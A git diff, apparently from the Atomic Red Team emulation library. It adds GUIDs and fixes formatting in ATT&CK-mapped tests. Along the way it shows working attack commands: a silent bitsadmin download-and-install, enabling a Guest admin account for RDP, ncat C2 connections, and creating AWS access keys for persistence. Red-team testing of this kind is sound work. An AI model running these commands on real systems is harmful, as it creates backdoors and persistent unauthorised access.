+  input_arguments:
+    radmin_installer:
+      description: Radmin Viewer installer
+      type: Path
+      default: '%TEMP%\RadminViewer.msi'
+    radmin_exe:
+      description: The radmin.exe executable from RadminViewer.msi
+      type: Path
+      default: '%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe'
+
+  dependencies:
+    - description: |
+        Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+      prereq_command: |
+        if not exist "#{radmin_exe}" (exit /b 1)
+      get_prereq_command: |
+        echo Downloading radmin installer
+        bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+        msiexec /i "#{radmin_installer}" /qn
+
+  executor:
+    name: command_prompt
+    elevation_required: true 
+    command: | 
+      "#{radmin_exe}"
\ No newline at end of file
diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md
index 87f04803..18147371 100644
--- a/atomics/T1074.001/T1074.001.md
+++ b/atomics/T1074.001/T1074.001.md
@@ -20,10 +20,14 @@ verify that the file is saved in the temp directory.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP&#92;discovery.bat|
 
@@ -53,10 +57,14 @@ Utilize curl to download discovery.sh and execute a basic information gathering
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074.001_discovery.log|
 
@@ -83,10 +91,14 @@ was placed in the temp directory.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Location to save zipped file or folder | Path | $env:TEMP&#92;Folder_to_zip.zip|
 | input_file | Location of file or folder to zip | Path | PathToAtomicsFolder&#92;T1074.001&#92;bin&#92;Folder_to_zip|
diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md
index c2c4a3b6..3d3aef89 100644
--- a/atomics/T1078.001/T1078.001.md
+++ b/atomics/T1078.001/T1078.001.md
@@ -12,18 +12,24 @@ Default accounts are not limited to client machines, rather also include account
 <br/>
 
 ## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges
-After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
+After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+and desktop will allow multiple RDP connections.
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | guest_user | Specify the guest account | String | guest|
 | guest_password | Specify the guest password | String | Password123!|
+| remove_rdp_access_during_cleanup | Set to 1 if you want the cleanup to remove RDP access to machine | Integer | 0|
 
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -43,8 +49,9 @@ reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConne
 net user #{guest_user} /active:no >nul 2>&1
 net localgroup administrators #{guest_user} /delete >nul 2>&1
 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
 ```
 
 
diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
index 3bc650f3..fef6894e 100644
--- a/atomics/T1078.001/T1078.001.yaml
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -3,7 +3,9 @@ display_name: 'Valid Accounts: Default Accounts'
 atomic_tests:
 - name: Enable Guest account with RDP capability and admin priviliges
   auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-  description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
+  description: |
+    After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+    and desktop will allow multiple RDP connections.
   supported_platforms:
   - windows
   input_arguments:
@@ -15,6 +17,10 @@ atomic_tests:
       description: Specify the guest password
       type: String
       default: Password123!
+    remove_rdp_access_during_cleanup:
+      description: Set to 1 if you want the cleanup to remove RDP access to machine
+      type: Integer
+      default: 0
   executor:
     command: |-
       net user #{guest_user} /active:yes
@@ -27,7 +33,8 @@ atomic_tests:
       net user #{guest_user} /active:no >nul 2>&1
       net localgroup administrators #{guest_user} /delete >nul 2>&1
       net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-      reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-      reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+      if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+      if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+      if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
     name: command_prompt
     elevation_required: true
diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md
index 36d3713c..5bc00429 100644
--- a/atomics/T1078.003/T1078.003.md
+++ b/atomics/T1078.003/T1078.003.md
@@ -17,6 +17,10 @@ After execution the new account will be active and added to the Administrators g
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15
+
+
+
 
 
 
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index 9a0e9550..d83db839 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -39,6 +39,10 @@ Identify System Info. Upon execution, system info and time info will be displaye
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667
+
+
+
 
 
 
@@ -64,6 +68,10 @@ Identify System Info
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6
+
+
+
 
 
 
@@ -89,10 +97,14 @@ Identify System Info
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file used to store the results. | path | /tmp/T1082.txt|
 
@@ -127,6 +139,10 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec
+
+
+
 
 
 
@@ -158,6 +174,10 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e
+
+
+
 
 
 
@@ -186,6 +206,10 @@ Identify system hostname for Windows. Upon execution, the hostname of the device
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f
+
+
+
 
 
 
@@ -210,6 +234,10 @@ Identify system hostname for Linux and macOS systems.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
+
+
+
 
 
 
@@ -234,6 +262,10 @@ Identify the Windows MachineGUID value for a system. Upon execution, the machine
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8
+
+
+
 
 
 
@@ -261,12 +293,16 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1595.002&#92;src&#92;griffon_recon.vbs|
+| vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1082&#92;src&#92;griffon_recon.vbs|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -290,6 +326,10 @@ Identify all environment variables. Upon execution, environments variables and y
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
+
+
+
 
 
 
@@ -314,6 +354,10 @@ Identify all environment variables. Upon execution, environments variables and y
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
+
+
+
 
 
 
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index 1f5b2ab7..95e3ebc2 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -121,7 +121,7 @@ atomic_tests:
     vbscript:
       description: Path to sample script
       type: String
-      default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+      default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
   executor:
     command: 'cscript #{vbscript}'
     name: powershell
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index a50dbcfe..6003c66b 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -24,6 +24,10 @@ all of the data discovery commands.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6
+
+
+
 
 
 
@@ -54,6 +58,10 @@ Find or discover files on the file system. Upon execution, file and folder infor
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924
+
+
+
 
 
 
@@ -86,10 +94,14 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file used to store the results. | path | /tmp/T1083.txt|
 
@@ -126,10 +138,14 @@ Find or discover files on the file system
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output file used to store the results. | path | /tmp/T1083.txt|
 
diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md
index de48610e..065f757c 100644
--- a/atomics/T1087.001/T1087.001.md
+++ b/atomics/T1087.001/T1087.001.md
@@ -37,10 +37,14 @@ Enumerate all accounts by copying /etc/passwd to another file
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
 
@@ -71,10 +75,14 @@ rm -f #{output_file}
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
 
@@ -105,10 +113,14 @@ View accounts with UID 0
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
 
@@ -139,6 +151,10 @@ List opened files by user
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
+
+
+
 
 
 
@@ -163,10 +179,14 @@ Show if a user account has ever logged in remotely
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt|
 
@@ -190,7 +210,7 @@ rm -f #{output_file}
 ##### Description: Check if lastlog command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; 
+if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -209,6 +229,10 @@ Utilize groups and id to enumerate users and groups
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
+
+
+
 
 
 
@@ -234,6 +258,10 @@ Utilize local utilities to enumerate users and groups
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2
+
+
+
 
 
 
@@ -263,6 +291,10 @@ Upon exection, multiple enumeration commands will be run and their output displa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab
+
+
+
 
 
 
@@ -291,6 +323,10 @@ Enumerate all accounts via PowerShell. Upon execution, lots of user account and
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b
+
+
+
 
 
 
@@ -323,6 +359,10 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3
+
+
+
 
 
 
@@ -347,6 +387,10 @@ Enumerate logged on users via PowerShell. Upon exeuction, logged on users will b
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03
+
+
+
 
 
 
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index f39060c1..02fd9e3e 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -36,6 +36,10 @@ Upon exection, multiple enumeration commands will be run and their output displa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
+
+
+
 
 
 
@@ -61,6 +65,10 @@ Enumerate all accounts via PowerShell. Upon execution, lots of user account and
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2
+
+
+
 
 
 
@@ -87,10 +95,14 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
 
@@ -117,10 +129,14 @@ path will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adrecon_path | Path of ADRecon.ps1 file | Path | $env:TEMP&#92;ADRecon.ps1|
 
@@ -144,7 +160,7 @@ Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-
 ##### Description: ADRecon must exist on disk at specified location (#{adrecon_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -164,10 +180,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -186,7 +206,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -206,10 +226,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -228,7 +252,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -248,10 +272,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -270,7 +298,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -290,10 +318,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -312,7 +344,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -331,6 +363,10 @@ This test will enumerate the details of the built-in domain admin account
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
+
+
+
 
 
 
@@ -358,10 +394,14 @@ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Domain FQDN | String | contoso.com|
 | uac_prop | UAC Property to search | String | 524288|
@@ -387,7 +427,7 @@ Try {
 }
 Catch {
     exit 1
-} 
+}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md
index 3559cb9e..7e9471af 100644
--- a/atomics/T1090.001/T1090.001.md
+++ b/atomics/T1090.001/T1090.001.md
@@ -23,10 +23,14 @@ Note that this test may conflict with pre-existing system configuration.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
 | proxy_scheme | Protocol to proxy (http or https) | string | http|
@@ -61,10 +65,14 @@ Note that this test may conflict with pre-existing system configuration.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | proxy_server | Proxy server URL (host) | string | 127.0.0.1|
 | proxy_port | Proxy server port | string | 8080|
@@ -100,10 +108,14 @@ netsh interface portproxy show all
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1|
 | connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337|
diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md
index 625bd04f..998ff39b 100644
--- a/atomics/T1095/T1095.md
+++ b/atomics/T1095/T1095.md
@@ -23,10 +23,14 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | server_ip | The IP address of the listening server | string | 127.0.0.1|
 
@@ -55,10 +59,14 @@ nc -l -p <port>
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | server_port | The port for the C2 connection | integer | 80|
 | ncat_exe | The location of ncat.exe | path | $env:TEMP&#92;T1095&#92;nmap-7.80&#92;ncat.exe|
@@ -80,7 +88,7 @@ cmd /c #{ncat_exe} #{server_ip} #{server_port}
 ##### Description: ncat.exe must be available at specified location (#{ncat_exe})
 ##### Check Prereq Commands:
 ```powershell
-if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} 
+if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -109,10 +117,14 @@ nc -l -p <port>
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1|
 | server_port | The port for the C2 connection | integer | 80|
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
new file mode 100644
index 00000000..c7e59069
--- /dev/null
+++ b/atomics/T1098.001/T1098.001.md
@@ -0,0 +1,66 @@
+# T1098.001 - Additional Cloud Credentials
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001)
+<blockquote>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
+
+Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
+
+In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key)
+
+
+<br/>
+
+## Atomic Test #1 - AWS - Create Access Key and Secret Key
+Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-491160a31122
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Create new AWS access and secret keys for the user | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+cd $PathToAtomicsFolder/T1098.001/bin/
+./aws_secret.sh
+```
+
+#### Cleanup Commands:
+```sh
+access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if the user exists.
+##### Check Prereq Commands:
+```sh
+aws iam list-users | grep #{username}
+```
+##### Get Prereq Commands:
+```sh
+echo Please run atomic test T1136.003, before running this atomic
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
new file mode 100644
index 00000000..6435b055
--- /dev/null
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -0,0 +1,31 @@
+attack_technique: T1098.001
+display_name: 'Account Manipulation: Additional Cloud Credentials'
+atomic_tests:
+- name: AWS - Create Access Key and Secret Key
+  auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+  description: |
+    Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    username:
+      description: Create new AWS access and secret keys for the user
+      type: String
+      default: "atomicredteam"
+  dependencies:
+    - description: |
+        Check if the user exists.
+      prereq_command: |
+        aws iam list-users | grep #{username}
+      get_prereq_command: |
+        echo Please run atomic test T1136.003, before running this atomic
+  executor:
+    command: |
+      aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+      cd $PathToAtomicsFolder/T1098.001/bin/
+      ./aws_secret.sh
+    cleanup_command: |
+      access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+      aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+      rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+    name: sh
\ No newline at end of file
diff --git a/atomics/T1098.001/bin/aws_secret.sh b/atomics/T1098.001/bin/aws_secret.sh
new file mode 100755
index 00000000..f96e740b
--- /dev/null
+++ b/atomics/T1098.001/bin/aws_secret.sh
@@ -0,0 +1,11 @@
+#! /bin/sh
+echo "Creating Profile in ./aws/credentials"
+access_key=`cat aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+secret_key=`cat aws_secret.creds| jq -r '.AccessKey.SecretAccessKey'`
